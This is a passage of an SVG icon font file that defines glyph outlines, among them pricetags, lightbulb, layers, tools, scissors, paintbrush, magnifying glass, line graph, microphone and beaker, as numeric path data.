103.36 43.392l237.024 236.992zM727.488 676.096c-6.688 6.688-17.504 6.688-24.192 0l-432-432c-6.688-6.656-6.688-17.504 0-24.192 3.328-3.328 7.712-5.024 12.096-5.024s8.736 1.664 12.096 5.024l432 432c6.688 6.688 6.688 17.504 0 24.192z" />
<glyph unicode="&#xe02f;" glyph-name="pricetags" horiz-adv-x="1344" d="M1296 960h-320c-22.112 0-50.368-12.032-65.504-27.84l-42.56-42.88c-6.208-6.272-6.144-16.416 0.128-22.624 6.208-6.208 16.416-6.176 22.624 0.096l42.688 43.072c9.12 9.504 29.44 18.176 42.624 18.176h320c8.8 0 16-7.168 16-16v-321.568c0-13.152-8.672-33.472-18.368-42.784l-450.592-447.104c-6.432-6.112-17.12-5.952-23.36 0.256l-84.736 84.768c-6.24 6.24-16.384 6.24-22.624 0s-6.24-16.384 0-22.624l84.736-84.768c9.408-9.376 21.888-14.112 34.368-14.112 12.224 0 24.48 4.512 33.984 13.568l450.624 447.136c15.936 15.296 27.968 43.552 27.968 65.664v321.568c0 26.464-21.536 48-48 48zM1249.216 800c0 35.296-28.704 64-64 64s-64-28.704-64-64 28.704-64 64-64 64 28.704 64 64zM1153.216 800c0 17.632 14.336 32 32 32s32-14.368 32-32-14.336-32-32-32-32 14.368-32 32zM526.784 832c-22.112 0-50.368-12.032-65.536-27.84l-447.776-452.192c-18.176-18.944-17.92-49.504 0.672-68.096l333.696-333.696c9.12-9.152 21.344-14.176 34.432-14.176 12.672 0 24.64 4.768 33.888 13.632l450.592 447.104c15.968 15.296 28.032 43.552 28.032 65.696v321.568c0 26.464-21.536 48-48 48h-320zM864 784v-321.568c0-13.184-9.888-33.472-19.584-42.784l-450.592-447.104c-6.24-5.92-17.28-5.792-23.328 0.256l-333.728 333.664c-6.24 6.272-6.368 16.96-0.416 23.136l447.808 452.224c9.12 9.504 29.44 18.176 42.624 18.176h320c8.8 0 17.216-7.168 17.216-16zM736 736c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM736 640c-17.664 0-32 14.368-32 32s14.336 32 32 32 32-14.368 32-32-14.336-32-32-32z" />
<glyph unicode="&#xe030;" glyph-name="lightbulb" horiz-adv-x="704" d="M352 960c-169.28 0-352-134.592-352-352 0-107.296 42.688-197.568 124.672-265.984 0.864-1.088 1.856-2.016 2.944-2.816 60.832-65.984 63.904-78.528 64.32-107.552 0.192-11.488 0.096-14.88 0-16.736l-0.128-6.688c-0.48-14.464-1.216-38.688 28.768-47.84l259.008-56.992c1.152-0.256 2.304-0.384 3.424-0.384 7.36 0 13.984 5.088 15.616 12.576 1.92 8.64-3.552 17.184-12.192 19.072l-257.76 56.672c-4.96 1.504-5.376 1.632-4.928 15.936l0.096 6.112c0 0 0.32 2.496 0.064 18.752-0.608 40.608-9.44 60.224-73.888 129.888-1.248 1.536-2.752 2.816-4.416 3.776-75.392 64.096-113.6 145.568-113.6 242.208 0 197.664 166.080 320 320 320 157.312 0 320-119.712 320-320 0-127.296-61.696-197.472-112.576-241.632-1.76-0.832-3.328-2.016-4.704-3.488-65.184-70.528-74.016-90.144-74.624-130.752 0-0.96-0.032-2.080 0-3.296l-0.032-1.12c-0.096-2.432-0.448-3.776-0.416-4.288-1.088 0.16-3.744 0.576-3.744 0.576l-134.24 31.584c-8.704 1.984-17.216-3.328-19.232-11.904-2.016-8.608 3.296-17.216 11.904-19.264l132.608-31.104c1.76-0.64 17.696-5.824 31.136 3.616 5.856 4.128 12.672 12.224 13.888 27.712l0.096 1.504c0.032 1.024 0.064 2.080 0.064 3.168 0 0.288 0 0.576-0.032 0.832l0.032 1.472c0.416 28.864 3.424 41.408 64.16 107.392 0.288 0.224 0.608 0.448 0.864 0.704 85.344 71.712 126.848 159.488 126.848 268.288 0 220.32-178.976 352-352 352zM480 16c7.328 0 13.92 5.024 15.584 12.48 1.984 8.608-3.424 17.184-12.064 19.136l-256 58.048c-8.672 1.92-17.184-3.456-19.136-12.064-1.984-8.608 3.424-17.184 12.064-19.136l256-58.048c1.216-0.288 2.4-0.416 3.552-0.416zM243.488 14.272c-8.672 1.92-17.152-3.488-19.136-12.096-1.92-8.64 3.488-17.184 12.128-19.104l208-46.656c1.216-0.288 2.368-0.416 3.52-0.416 7.328 0 13.952 5.056 15.616 12.512 1.92 8.64-3.488 17.184-12.128 19.104l-208 46.656z" />
<glyph unicode="&#xe031;" glyph-name="layers" d="M984.48 727.616l-369.376 208.48c-50.272 28.384-136.672 28.416-187.040 0l-369.376-208.48c-28.256-15.968-43.776-38.304-43.776-62.944s15.552-46.976 43.776-62.912l369.376-208.512c25.152-14.208 58.368-22.016 93.504-22.016 35.168 0 68.384 7.84 93.536 22.016l369.376 208.512c28.256 15.936 43.808 38.272 43.808 62.912s-15.584 46.976-43.808 62.944zM967.648 631.52l-369.376-208.512c-39.616-22.368-113.792-22.4-153.408 0l-369.376 208.512c-16.768 9.472-26.368 21.568-26.368 33.152 0 11.616 9.6 23.68 26.368 33.184l369.376 208.512c19.808 11.2 47.776 17.6 76.672 17.6 28.928 0 56.896-6.432 76.704-17.6l369.376-208.512c16.768-9.472 26.4-21.568 26.4-33.184 0.032-11.584-9.568-23.68-26.368-33.152zM984.48 508.832c-8.192 4.64-18.624 1.76-23.328-6.496-4.64-8.224-1.728-18.656 6.496-23.296 16.768-9.472 26.4-21.568 26.4-33.152s-9.632-23.68-26.4-33.152l-369.376-208.512c-41.536-23.456-111.808-23.488-153.408 0l-369.376 208.512c-16.768 9.472-26.368 21.568-26.368 33.152s9.6 23.68 26.368 33.152c8.224 4.64 11.136 15.072 6.496 23.296-4.672 8.256-15.136 11.168-23.328 6.496-28.256-15.936-43.776-38.304-43.776-62.944s15.52-47.008 43.776-62.944l369.376-208.512c26.208-14.784 59.872-22.208 93.504-22.208 33.664 0 67.328 7.392 93.536 22.208l369.376 208.512c28.256 15.936 43.808 38.304 43.808 62.944s-15.552 47.008-43.776 62.944zM984.48 294.272c-8.192 4.64-18.624 1.76-23.328-6.496-4.64-8.224-1.728-18.656 6.496-23.296 16.768-9.472 26.4-21.568 26.4-33.152s-9.632-23.68-26.4-33.184l-369.376-208.512c-41.536-23.456-111.808-23.488-153.408 0l-369.376 208.544c-16.768 9.472-26.368 21.568-26.368 33.184 0 11.584 9.6 23.68 26.368 33.152 8.224 4.64 11.136 15.072 6.496 23.296-4.672 8.224-15.136 11.168-23.328 6.496-28.192-15.968-43.744-38.304-43.744-62.976s15.52-47.008 43.776-62.944l369.376-208.512c26.208-14.784 59.872-22.208 93.504-22.208 33.664 0 67.328 7.392 93.536 22.208l369.376 208.512c28.256 15.968 43.808 38.304 43.808 62.944s-15.584 47.008-43.808 62.944z" />
<glyph unicode="&#xe032;" glyph-name="pencil3" d="M0-47.328c0-8.832 7.168-16 16-16h995.552c2.144 0 4.224 0.416 6.176 1.248s3.712 2.016 5.184 3.488c0.032 0.032 0.064 0.032 0.096 0.064 0.096 0.096 0.096 0.288 0.224 0.384 1.632 1.76 2.688 3.904 3.424 6.24 0.224 0.736 0.32 1.44 0.448 2.208 0.128 0.8 0.48 1.504 0.48 2.336 0 1.28-0.448 2.4-0.736 3.584-0.096 0.448 0.096 0.896-0.064 1.344l-101.12 310.88c-0.768 2.4-2.112 4.608-3.904 6.368l-547.744 547.776c-0.576 0.896-0.992 1.856-1.76 2.656l-119.648 119.648c-19.424 19.424-51.040 19.424-70.496 0l-167.52-167.52c-9.408-9.408-14.592-21.92-14.592-35.232s5.184-25.856 14.592-35.264l116.992-116.992c0.576-0.864 0.96-1.856 1.728-2.624l546.88-550.56c1.888-1.92 4.192-3.296 6.784-4.064l214.816-64h-885.792c-8.832 0.032-16-7.136-16-15.968zM203.584 634.848l501.984-495.552-18.464-64.064-519.84 523.296 36.32 36.32zM730.112 160l-503.936 497.44 77.984 77.984 499.424-500.736v-74.688h-73.472zM823.52 260l-496.736 498.048 33.248 33.248 518.752-518.752-55.264-12.544zM735.616 128h83.968c8.832 0 16 7.168 16 16v85.92l64.224 14.592 87.136-267.84-271.616 80.928 20.288 70.4zM32 742.144c0 4.768 1.856 9.216 5.216 12.608l167.52 167.52c6.944 6.944 18.24 6.976 25.248 0l107.904-107.904-192.736-192.736-107.904 107.904c-3.392 3.36-5.248 7.84-5.248 12.608z" />
<glyph unicode="&#xe033;" glyph-name="tools" horiz-adv-x="992" d="M6.752 779.328c-27.104-27.136-21.312-65.344 0.256-86.88 0.864-0.832 87.488-83.584 209.312-205.408 3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624-18.368 18.368-35.84 35.744-52.416 52.192l50.848 50.848c6.24 6.24 6.24 16.384 0 22.624s-16.384 6.24-22.624 0l-50.976-50.976c-28.512 28.16-53.632 52.736-74.080 72.672l115.68 115.68c6.24 6.24 6.24 16.384 0 22.624s-16.384 6.24-22.624 0l-116.032-116.032c-23.552 22.816-37.12 35.776-37.344 36-6.752 6.752-15.616 25.76 0 41.376l160 160c6.176 6.272 22.624 18.72 40.672 0.768 0.8-0.896 81.6-92.672 204.928-216 6.24-6.24 16.384-6.24 22.624 0s6.24 16.384 0 22.624c-122.56 122.528-202.752 213.6-204.224 215.264-29.824 29.76-65.792 20.832-86.624 0l-160.032-160zM685.408 187.328c-6.24 6.24-16.384 6.24-22.624 0l-50.912-50.88c-15.52 15.712-31.808 32.16-48.96 49.312-6.24 6.24-16.384 6.24-22.624 0s-6.24-16.384 0-22.624c118.528-118.496 201.312-207.008 202.496-208.288 10.976-11.008 26.016-17.056 42.336-17.056v0c16.8 0 33.792 6.56 44.32 17.12l159.936 161.824c20.128 20.128 21.28 54.272 2.496 73.12l-214.592 214.56c-6.24 6.24-16.384 6.24-22.624 0s-6.24-16.384 0-22.624l214.592-214.56c6.4-6.4 5.184-20.224-2.528-27.936l-159.968-161.824c-3.68-3.712-12.032-7.68-21.632-7.68 0 0 0 0 0 0-5.504 0-13.376 1.344-19.328 7.328-0.32 0.352-13.728 14.656-36.992 39.008l116.608 116.608c6.24 6.24 6.24 16.384 0 22.624s-16.384 6.24-22.624 0l-116.128-116.128c-19.968 20.768-44.448 46.016-72.32 74.432l51.072 51.072c6.24 6.208 6.24 16.32 0 22.592zM-9.376-58.528c3.072-3.136 7.2-4.8 11.456-4.8 1.536 0 3.072 0.224 4.576 0.672l320 95.328c2.592 0.768 4.896 2.144 6.784 4.064l546.88 550.56c0.768 0.768 1.152 1.76 1.728 2.624l116.992 116.992c9.408 9.44 14.624 21.952 14.624 35.296 0 13.312-5.216 25.824-14.624 35.2l-167.52 167.488c-18.816 18.816-51.68 18.816-70.496 0l-119.648-119.648c-0.768-0.768-1.184-1.76-1.76-2.656l-547.712-547.744c-1.792-1.792-3.136-3.968-3.904-6.368l-101.12-310.88c-1.856-5.664-0.416-11.84 3.744-16.128zM653.6 791.328l33.248-33.248-496.736-498.080-55.264 12.544 518.752 518.784zM210.080 234.688l499.424 500.736 77.952-77.952-503.936-497.472h-73.44v74.688zM846.368 598.528l-519.808-523.328-18.464 64.064 501.984 495.584 36.288-36.32zM113.856 244.512l64.224-14.592v-85.92c0-8.832 7.168-16 16-16h83.968l20.288-70.4-271.616-80.928 87.136 267.84zM783.68 922.272c6.752 6.752 18.496 6.752 25.248 0l167.52-167.52c3.36-3.36 5.216-7.84 5.216-12.608 0-4.736-1.856-9.248-5.248-12.64l-107.872-107.904-192.736 192.736 107.872 107.936z" />
<glyph unicode="&#xe034;" glyph-name="tools-2" d="M907.328 916.672c3.68 3.68 5.344 8.928 4.448 14.048s-4.224 9.504-8.96 11.712c-73.312 34.56-160.32 19.392-217.536-38.112-54.336-54.688-73.312-140.576-47.968-212.384l-369.248-369.248c-20.064 7.168-41.504 10.752-63.872 10.752-54.848 0-108.032-21.824-145.888-59.904-57.024-57.344-73.088-142.080-40.992-215.904 2.112-4.864 6.496-8.384 11.712-9.344 5.248-0.992 10.592 0.672 14.304 4.448l111.712 112.288c7.36 7.424 19.232 8.416 25.376 2.176l48.224-50.464c7.008-7.072 6.688-17.984-0.704-25.44l-111.296-112c-3.68-3.68-5.312-8.928-4.416-14.048s4.224-9.472 8.928-11.68c26.528-12.512 54.432-18.816 82.912-18.816 50.304 0 98.080 20.224 134.624 56.96 54.336 54.656 73.312 140.544 47.936 212.352l369.248 369.28c20.096-7.168 41.536-10.752 63.904-10.752 54.848 0 108.032 21.824 145.888 59.904 57.024 57.344 73.088 142.080 40.992 215.904-2.112 4.864-6.496 8.384-11.712 9.344-5.152 0.896-10.56-0.672-14.304-4.448l-111.712-112.288c-6.88-6.912-18.56-6.848-25.632 0.32l-47.968 47.968c-7.232 7.264-7.2 18.176-0.032 25.408l112.032 111.968zM772.672 756.672l47.968-47.968c19.168-19.264 52-19.36 70.976-0.288l93.76 94.208c15.008-55.712-0.512-115.488-42.368-157.632-31.904-32.096-76.768-50.464-123.2-50.464-21.856 0-42.56 4.096-61.536 12.16-6.016 2.592-12.96 1.184-17.568-3.392l-384-384c-4.608-4.608-5.952-11.52-3.424-17.504 25.696-61.12 10.048-140-37.216-187.552-42.272-42.496-103.808-57.632-159.52-40.256l94.112 94.72c19.872 20 20.192 51.008 0.928 70.336l-48.192 50.464c-18.592 18.72-51.648 17.568-70.976-1.984l-93.76-94.208c-15.008 55.712 0.512 115.488 42.368 157.632 31.904 32.096 76.768 50.464 123.2 50.464 21.856 0 42.56-4.096 61.536-12.16 5.984-2.624 12.96-1.184 17.568 3.392l384 384c4.608 4.608 5.952 11.52 3.424 17.504-25.696 61.12-10.048 140.032 37.216 187.584 42.24 42.496 103.744 57.536 159.424 40.256l-94.72-94.752c-19.712-19.744-19.712-50.72 0-70.56zM934.72-20.704c-7.072-7.104-19.328-7.104-26.464 0.064l-320.96 320c-6.24 6.176-16.384 6.208-22.624-0.064-6.24-6.24-6.208-16.384 0.032-22.624l320.928-319.936c9.6-9.632 22.336-14.944 35.904-14.944 0 0 0 0 0 0 13.568 0 26.304 5.312 36.096 15.168l45.728 47.776c19.68 19.776 19.68 50.784-0.032 70.592l-320 320c-6.24 6.24-16.384 6.24-22.624 0s-6.24-16.384 0-22.624l319.968-319.968c7.328-7.36 7.328-18.048-0.224-25.664l-45.728-47.776zM187.328 859.328l-96 96c-6.24 6.24-16.384 6.24-22.624 0l-64-64c-6.24-6.24-6.24-16.384 0-22.624l96-96c3.104-3.136 7.2-4.704 11.296-4.704s8.192 1.568 11.328 4.672l20.672 20.704 244.672-244.672c3.136-3.136 7.232-4.704 11.328-4.704s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-244.704 244.704 20.672 20.672c6.272 6.272 6.272 16.384 0.032 22.656zM112 806.624l-73.376 73.376 41.376 41.376 73.376-73.376-41.376-41.376z" />
<glyph unicode="&#xe035;" glyph-name="scissors2" d="M816 32c61.76 0 112 50.24 112 112s-50.24 112-112 112-112-50.24-112-112 50.24-112 112-112zM816 224c44.096 0 80-35.872 80-80s-35.904-80-80-80-80 35.872-80 80 35.904 80 80 80zM599.424 193.6c0-46.432 11.424-104.672 26.752-137.632 31.36-79.584 93.056-119.968 183.424-119.968 118.208 0 214.4 96.192 214.4 214.4 0 114.976-90.176 198.4-214.4 198.4-141.216 0-187.296 75.872-189.12 79.008-0.64 1.088-1.376 2.112-2.24 3.040l-491.36 524.096c-4.48 4.768-11.456 6.304-17.568 3.936-6.080-2.4-10.112-8.32-10.112-14.88 0-308.832 205.952-470.88 356.32-589.152 80.416-63.264 143.904-113.184 143.904-161.248zM132.608 902.048l461.184-491.904c8.576-13.568 65.408-93.344 215.808-93.344 105.696 0 182.4-69.984 182.4-166.4 0-100.608-81.824-182.4-182.4-182.4-76.96 0-127.232 32.64-154.016 100.608-11.712 25.152-24.16 77.536-24.16 124.992 0 63.584-68.896 117.792-156.096 186.4-138.144 108.672-324.864 255.52-342.72 522.048zM96 144c0-61.76 50.24-112 112-112s112 50.24 112 112-50.24 112-112 112-112-50.24-112-112zM288 144c0-44.128-35.904-80-80-80s-80 35.872-80 80 35.904 80 80 80 80-35.872 80-80zM660.288 464.928c-6.528-5.952-7.008-16.064-1.056-22.592 3.168-3.456 7.488-5.216 11.84-5.216 3.84 0 7.712 1.376 10.784 4.192 113.12 103.040 242.944 253.28 242.944 502.688 0 6.56-4 12.48-10.112 14.88-6.080 2.336-13.056 0.832-17.568-3.936l-349.44-372.672c-6.048-6.432-5.728-16.576 0.736-22.592 6.432-6.016 16.544-5.76 22.624 0.704l320.448 341.76c-13.632-212.16-129.472-344.512-231.2-437.216zM349.152 355.328c8.224 3.2 12.32 12.448 9.152 20.672s-12.48 12.384-20.704 9.12c-6.752-2.624-14.048-5.856-21.888-9.344-27.008-12-60.64-26.976-101.312-26.976-124.224 0-214.4-83.424-214.4-198.4 0-118.208 96.192-214.4 214.4-214.4 90.368 0 152.064 40.384 183.008 119.104 16.192 34.72 18.592 110.72 18.592 152.896 0 8.608 24.384 26.976 38.976 37.952 13.472 10.112 27.392 20.608 36.992 31.424 5.856 6.624 5.248 16.736-1.344 22.592-6.592 5.888-16.736 5.248-22.592-1.344-7.488-8.48-20.096-17.952-32.32-27.136-26.592-20.032-51.712-38.912-51.712-63.488 0-66.304-5.824-118.432-15.968-140.288-26.4-67.072-76.672-99.712-153.632-99.712-100.576 0-182.4 81.824-182.4 182.4 0 96.448 76.704 166.4 182.4 166.4 47.488 0 86.112 17.216 114.336 29.792 7.296 3.264 14.112 6.272 20.416 8.736zM486.208 416.512c0-14.245 11.547-25.792 25.792-25.792s25.792 11.547 25.792 25.792c0 14.245-11.547 25.792-25.792 25.792s-25.792-11.547-25.792-25.792z" />
<glyph unicode="&#xe036;" glyph-name="paintbrush" horiz-adv-x="704" d="M492.896 288h146.56c33.696 0 61.088 27.392 64.544 61.088v549.824c-3.456 33.696-30.848 61.088-64.544 61.088h-574.912c-33.696 0-61.088-27.392-64.544-61.088v-549.824c3.456-33.696 30.848-61.088 64.544-61.088h158.784c11.136 0 66.656-2.368 66.656-49.344 0-83.904-17.696-122.944-24.384-137.664l-1.568-3.488 12.896-5.568v-0.416l-14.304 2.88c-0.544-1.056-0.96-2.176-1.216-3.328-4.928-13.152-7.424-26.656-7.424-40.224 0.032-68.704 39.392-114.848 98.016-114.848 59.232 0 99.008 46.144 99.008 114.848 0 12.512-2.112 24.96-6.336 37.152-0.16 3.648-1.568 7.040-3.808 9.664-0.832 1.92-1.92 4-3.232 6.464-7.008 13.28-21.632 40.864-21.632 134.528 0 19.84 20.48 49.344 76.896 49.344zM32 574.112h640v-126.112h-640v126.112zM64.544 928h574.912c16.032 0 29.088-13.056 32.544-29.088v-292.768h-640v292.768c3.456 16.032 16.512 29.088 32.544 29.088zM409.344 89.152c0.896-1.696 1.664-3.104 2.976-6.048 0-0.032 0.096-0.224 0.224-0.512 0.128-0.416 0.256-0.8 0.416-1.216 4-10.016 6.016-20.32 6.016-30.528 0.032-40.064-17.568-82.848-66.976-82.848-48.672 0-65.984 42.784-65.984 82.848 0 10.208 2.016 20.512 6.016 30.528 0.128 0.384 0.288 0.736 0.384 1.12 0.448 0.96 0.992 2.176 1.056 2.304l1.344 2.976c7.424 16.448 27.232 60.032 27.232 150.88-0.064 64.224-62.048 81.344-99.648 81.344 0 0 0 0-0.032 0h-157.824c-16.032 0-29.088 13.056-32.544 29.088v66.912h640v-66.912c-3.456-16.032-16.512-29.088-32.544-29.088h-146.56c-79.904 0-108.896-48.672-108.896-81.344 0-101.6 17.12-133.984 25.344-149.504z" />
<glyph unicode="&#xe037;" glyph-name="magnifying-glass" d="M336 960c-185.28 0-336-150.72-336-336s150.72-336 336-336c87.2 0 166.496 33.664 226.272 88.32 0.704-1.248 1.344-2.56 2.432-3.648l68.832-68.832c-5.76-9.728-9.024-20.736-9.024-32.352 0-17.088 6.656-33.152 18.752-45.248l271.52-271.52c12.064-12.064 28.128-18.72 45.216-18.72s33.152 6.656 45.248 18.752 18.752 28.16 18.752 45.248-6.656 33.152-18.752 45.248l-271.52 271.52c-20.288 20.288-53.088 23.328-77.44 9.568l-68.96 68.96c-1.088 1.088-2.368 1.728-3.648 2.432 54.656 59.776 88.32 139.072 88.32 226.272 0 185.28-150.72 336-336 336zM711.104 294.144l271.52-271.52c6.048-6.048 9.376-14.080 9.376-22.624s-3.328-16.576-9.376-22.624c-12.128-12.064-33.12-12.064-45.248 0l-271.52 271.52c-6.016 6.048-9.376 14.080-9.376 22.624s3.328 16.576 9.376 22.624c6.048 6.016 14.080 9.376 22.624 9.376s16.544-3.328 22.624-9.376zM336 320c-167.616 0-304 136.384-304 304s136.384 304 304 304 304-136.384 304-304-136.384-304-304-304zM336 864c-132.352 0-240-107.648-240-240s107.648-240 240-240 240 107.648 240 240-107.648 240-240 240zM336 416c-114.688 0-208 93.312-208 208s93.312 208 208 208 208-93.312 208-208-93.312-208-208-208z" />
<glyph unicode="&#xe038;" glyph-name="circle-compass" horiz-adv-x="736" d="M368.448 768c8.832 0 16 7.168 16 16v48h15.552c8.832 0 16 7.168 16 16v96c0 8.832-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16v-96c0-8.832 7.168-16 16-16h16.448v-48c0-8.832 7.136-16 16-16zM352 928h32v-64h-32v64zM8.576-58.144c2.368-1.248 4.896-1.856 7.424-1.856 5.76 0 11.328 3.136 14.144 8.576l137.344 261.536c61.6-30.944 129.888-47.68 200.928-47.68 70.848 0 139.008 16.672 200.48 47.456l136.896-261.312c2.88-5.44 8.448-8.576 14.176-8.576 2.496 0 5.056 0.608 7.424 1.824 7.808 4.128 10.848 13.792 6.752 21.632l-137.216 261.92c31.712 18.88 61.504 41.344 88.256 68.096 31.2 31.2 31.2 81.952 0 113.12-30.24 30.24-83.008 30.176-113.12 0-15.136-15.136-31.808-28.16-49.44-39.36l-75.456 144.032c29.216 23.328 48.352 58.784 48.352 98.976 0 70.080-57.024 127.136-127.136 127.136s-127.040-57.056-127.040-127.168c0-40.16 19.072-75.584 48.224-98.912l-75.616-143.936c-17.536 11.2-34.112 24.16-49.152 39.2-30.24 30.24-83.008 30.176-113.12 0-31.2-31.2-31.2-81.952 0-113.12 26.624-26.624 56.288-49.024 87.84-67.84l-137.664-262.144c-4.128-7.84-1.12-17.504 6.72-21.6zM108.224 398.016c12.832 0 24.896-4.992 33.984-14.048 60.352-60.352 140.672-93.568 226.24-93.568s165.952 33.216 226.304 93.568c18.112 18.144 49.76 18.080 67.872 0 18.72-18.72 18.72-49.152 0-67.872-78.464-78.432-182.976-121.664-294.176-121.664-111.264 0-215.68 43.232-294.112 121.664-18.72 18.72-18.72 49.152 0 67.872 9.024 9.024 21.056 14.048 33.888 14.048zM273.344 610.208c0 52.448 42.656 95.136 95.104 95.136s95.136-42.688 95.136-95.136-42.688-95.136-95.136-95.136-95.104 42.72-95.104 95.136zM316.768 494.304c15.808-7.072 33.248-11.232 51.68-11.232 18.368 0 35.744 4.096 51.52 11.136l74.72-142.624c-38.848-18.944-81.696-29.248-126.24-29.248-44.672 0-87.616 10.336-126.528 29.376l74.848 142.592z" />
<glyph unicode="&#xe039;" glyph-name="linegraph" horiz-adv-x="1344" d="M1248 960c-52.928 0-96-43.072-96-96 0-28.416 12.672-53.728 32.352-71.328l-281.6-448.992c-11.872 5.28-24.96 8.32-38.752 8.32-27.776 0-52.608-12.032-70.176-30.944l-290.336 183.84c5.376 11.968 8.512 25.152 8.512 39.104 0 52.928-43.072 96-96 96s-96-43.072-96-96c0-28.928 13.12-54.592 33.408-72.192l-220.64-351.2c-11.328 4.736-23.744 7.392-36.768 7.392-52.928 0-96-43.072-96-96s43.072-96 96-96 96 43.072 96 96c0 28.416-12.64 53.696-32.32 71.296l220.928 351.68c10.976-4.416 22.88-6.976 35.392-6.976 27.488 0 52.128 11.744 69.632 30.304l290.496-183.936c-5.152-11.776-8.128-24.704-8.128-38.368 0-52.928 43.072-96 96-96s96 43.072 96 96c0 27.616-11.872 52.352-30.624 69.888l281.92 449.472c11.328-4.704 23.712-7.36 36.704-7.36 52.928 0 96 43.072 96 96s-43.072 96-96 96zM160 32c0-35.296-28.704-64-64-64s-64 28.704-64 64 28.704 64 64 64 64-28.704 64-64zM416 480c-35.296 0-64 28.704-64 64s28.704 64 64 64 64-28.704 64-64-28.704-64-64-64zM864 192c-35.296 0-64 28.704-64 64s28.704 64 64 64 64-28.704 64-64-28.704-64-64-64zM1248 800c-35.296 0-64 28.704-64 64s28.704 64 64 64 64-28.704 64-64-28.704-64-64-64z" />
<glyph unicode="&#xe03a;" glyph-name="mic2" horiz-adv-x="480" d="M224 191.776v-127.776h-94.912c-36.512 0-64-27.488-64-64v-48c0-8.832 7.168-16 16-16h320c8.832 0 16 7.168 16 16v45.6c0 37.248-28.128 66.4-64 66.4h-97.088v127.776c127.136 8.896 226.176 113.92 226.176 242.048v60.384c0 9.44-7.648 17.088-17.088 17.088s-17.088-7.68-17.088-17.12v-60.384c0-115.104-92.8-208.704-206.912-208.704s-206.912 93.632-206.912 208.704v60.384c0 9.44-7.648 17.088-17.088 17.088s-17.088-7.648-17.088-17.088v-60.384c0-128.096 99.040-233.12 224-242.016zM385.088-2.4v-29.6h-288v32c0 18.848 13.152 32 32 32h224c18.24 0 32-14.784 32-34.4zM241.088 961.088c-80 0-145.088-65.888-145.088-146.912v-380.384c0-80.992 65.088-146.912 145.088-146.912s145.088 65.92 142.912 146.912v380.384c2.176 81.024-62.912 146.912-142.912 146.912zM352 433.824c0-62.144-49.76-112.704-110.912-112.704s-113.088 50.528-113.088 112.704v380.352c0 62.144 51.936 112.704 113.088 112.704s110.912-50.528 110.912-112.704v-380.352z" />
<glyph unicode="&#xe03b;" glyph-name="strategy" horiz-adv-x="736" d="M704-48c0 8.832-7.168 16-16 16h-576c-8.832 0-16-7.168-16-16s7.168-16 16-16h576c8.832 0 16 7.168 16 16zM40.768 660.672c-13.376-8.896-33.664-35.968-14.432-74.432 15.968-31.904 49.28-70.944 84.704-81.248 18.048-5.312 35.84-3.104 51.36 6.272 35.168 21.056 76.704 49.536 94.304 61.76 22.208-11.232 50.24-13.568 78.72-6.24 0.128 0.032 0.256 0.096 0.384 0.128-1.664-52.832-19.552-85.824-107.008-167.040-77.952-72.352-124.192-167.392-123.744-254.272 0.32-56.992 21.088-105.92 60.16-141.408 2.976-2.72 6.816-4.192 10.784-4.192h448c8.832 0 16 7.168 16 16s-7.168 16-16 16h-441.632c-29.408 28.96-45.024 68.16-45.28 113.76-0.416 76.864 43.104 165.28 113.504 230.656 93.28 86.592 117.408 127.616 117.408 199.584 0 1.312-0.448 2.464-0.736 3.68 17.504 9.44 32.64 21.92 42.976 37.024 12.96 18.88 40.864 67.36 20.16 110.272-3.84 7.904-13.408 11.264-21.376 7.424-7.936-3.84-11.296-13.408-7.424-21.376 9.312-19.296 2.688-48.544-17.728-78.24-11.776-17.152-32.832-31.008-56.352-37.024-23.904-6.112-46.624-3.424-62.464 7.424-5.536 3.776-12.8 3.744-18.272-0.128-0.576-0.384-56.864-40.032-100.768-66.368-8.032-4.8-16.512-5.824-25.984-3.008-24.768 7.232-52 38.784-65.024 64.832-10.528 21.056 0.256 31.104 5.152 34.688 110.304 95.264 165.664 194.24 167.936 198.432 2.112 3.904 2.56 8.512 1.152 12.768-0.16 0.48-11.2 34.016-17.28 65.056 33.472-20.16 91.040-48.32 150.976-48.32 83.328 0 277.056-31.104 277.056-319.232 0-1.568-0.288-158.208-63.040-330.464-3.040-8.288 1.248-17.472 9.568-20.512 1.824-0.608 3.648-0.928 5.472-0.928 6.528 0 12.672 4.032 15.040 10.528 64.672 177.536 64.992 334.912 64.96 341.472 0 325.856-236.576 351.168-309.056 351.168-80.288 0-160.384 60.896-161.152 61.536-4.896 3.68-11.36 4.288-16.864 1.632-5.472-2.688-8.928-8.256-8.928-14.336 0-31.392 14.88-82.176 20.672-100.704-13.376-22.336-66.112-104.992-155.904-182.624zM559.52 910.72c-51.232 34.528-108.512 49.28-191.52 49.28-8.832 0-16-7.168-16-16s7.168-16 16-16c76.16 0 128.096-13.088 173.664-43.808 74.048-49.984 162.336-149.568 162.336-340.192 0-46.432 0-110.016-31.52-236.128-2.112-8.576 3.072-17.248 11.648-19.392 1.312-0.32 2.592-0.48 3.872-0.48 7.2 0 13.728 4.832 15.52 12.128 32.48 129.888 32.48 195.776 32.48 243.872 0 204.672-95.968 312.416-176.48 366.72z" />
<glyph unicode="&#xe03c;" glyph-name="beaker" horiz-adv-x="864" d="M560 928c8.832 0 16 7.168 16 16s-7.168 16-16 16h-288c-8.832 0-16-7.168-16-16s7.168-16 16-16h288zM31.68 75.68c-34.368-48.352-30.528-79.936-21.248-97.92 9.824-19.040 35.424-41.76 101.568-41.76h640c66.144 0 91.744 22.72 101.568 41.792 9.28 17.984 13.12 49.568-20.736 97.088l-199.008 318.4-2.816 3.968c-14.304 20.416-87.008 146.048-87.008 250.752v232c0 8.832-7.168 16-16 16h-224c-8.832 0-16-7.168-16-16v-232c0-111.712-78.88-254.624-79.776-256.16l-176.544-316.16zM825.152-7.52c-8.032-15.584-34.688-24.48-73.152-24.48h-640c-38.464 0-65.12 8.896-73.152 24.48-7.328 14.208-0.64 37.184 19.84 66.112l159.968 286.336 0.224-0.128c29.12-16.8 59.232-34.176 119.008-34.176s89.92 17.344 119.008 34.112c26.656 15.36 51.808 29.888 103.040 29.888 19.424 0 36.256-2.4 51.744-6.72l194.56-310.784c19.552-27.456 26.24-50.432 18.912-64.64zM320 648v216h192v-216c0-90.88 48.512-193.344 76.928-243.264-9.28 1.056-18.72 1.888-28.96 1.888-59.808 0-89.92-17.344-119.008-34.112-26.656-15.36-51.808-29.888-103.040-29.888s-76.384 14.528-103.008 29.888l-0.608 0.352 